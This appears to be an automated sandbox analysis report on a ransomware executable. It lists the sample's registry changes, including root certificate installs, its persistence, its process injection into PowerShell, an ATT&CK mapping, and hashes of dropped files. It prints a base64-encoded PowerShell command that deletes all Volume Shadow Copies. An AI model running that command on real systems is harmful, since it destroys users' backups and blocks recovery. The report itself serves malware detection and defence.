59e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a919000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c02000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exepowershell.exe

pid process

2180 13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
2248 powershell.exe

pid	process
2180	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
2248	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2180	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeBackupPrivilege	2712	vssvc.exe
Token: SeRestorePrivilege	2712	vssvc.exe
Token: SeAuditPrivilege	2712	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe

description	pid	process	target process
PID 2180 wrote to memory of 2248	2180	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe	powershell.exe
PID 2180 wrote to memory of 2248	2180	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe	powershell.exe
PID 2180 wrote to memory of 2248	2180	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe	powershell.exe
PID 2180 wrote to memory of 2248	2180	13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe	powershell.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\13577e7b34a4c62a7a0944121ff84c70_JaffaCakes118.exe"
1⤵
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2932

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2712

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

3

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\7zr2x39k-readme.txt
Filesize
6KB

MD5
b2132c1144dbfa92c2fe8a036a5ef91b

SHA1
5fd3acd4f84316d4574110b473721299de4cd565

SHA256
c74028ab834e1a86e433a37d3161c408c43cff5e923e8001f160b700ed205dc9

SHA512
249ff8475609d76b39c90ffdb2368b0e8e7001ee3c7dc182a4452b8fc81cfac947edc9c1aca07643f53172be42894863f023e46181d44424c2d634388764b9db

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
8c7b9fdf58f261406dc234a2e912e2b3

SHA1
fb1447c9499e0fb890eb1d988342a30a6542fde6

SHA256
92d2d2562404d3791341e24ac31d75982b9a5348f2bc8c76aaaca9b11de7c278

SHA512
913bab625419eadddc6c5528deaec55bef5a893bfa23adf4e73ade459605083baf78c30987ced2d31ee03bfeeed2814ac031289981e6c432a7a6fe2a1fc4d258

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
36f08b118e5968b19bd47fccea4a77af

SHA1
98b46f5588ad45bd8c0ed05543d98a6bca9581ce

SHA256
966fb93de8d044dfc151e239bb2cd561f02b78070e37f01af4ea91ad699ebde3

SHA512
3884182712b110196bd18f26ef8eae1504499ff7e37319ea18ae2319afafeb88818bf67e9347d7c58b1790801819beaba4eb7582054c3061600689633b6d79b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3864.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Windows\System32\catroot2\dberr.txt
Filesize
194KB

MD5
955af352d0f6b433e28bc82ed08ec16b

SHA1
21536ac0f93e3095e295fbf65af5d7867c96842b

SHA256
0feca134d10fcaa76adb3277839e88d70f4d4fa2323e0e89d5c6f949aa331bd5

SHA512
9abd9f29252eb9f31a08b54898e0e0adaf064d73112a45ee4ba2f4338da9739b428e6a459d43a27bf89ad464a3bfbd57d1963239c7617230e9deeb2a11bbfd66

Download Submit
memory/2248-8-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2248-12-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2248-11-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2248-10-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2248-9-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2248-4-0x000007FEF5D8E000-0x000007FEF5D8F000-memory.dmp

Filesize
4KB

Download
memory/2248-7-0x000007FEF5AD0000-0x000007FEF646D000-memory.dmp

Filesize
9.6MB

Download
memory/2248-6-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download
memory/2248-5-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads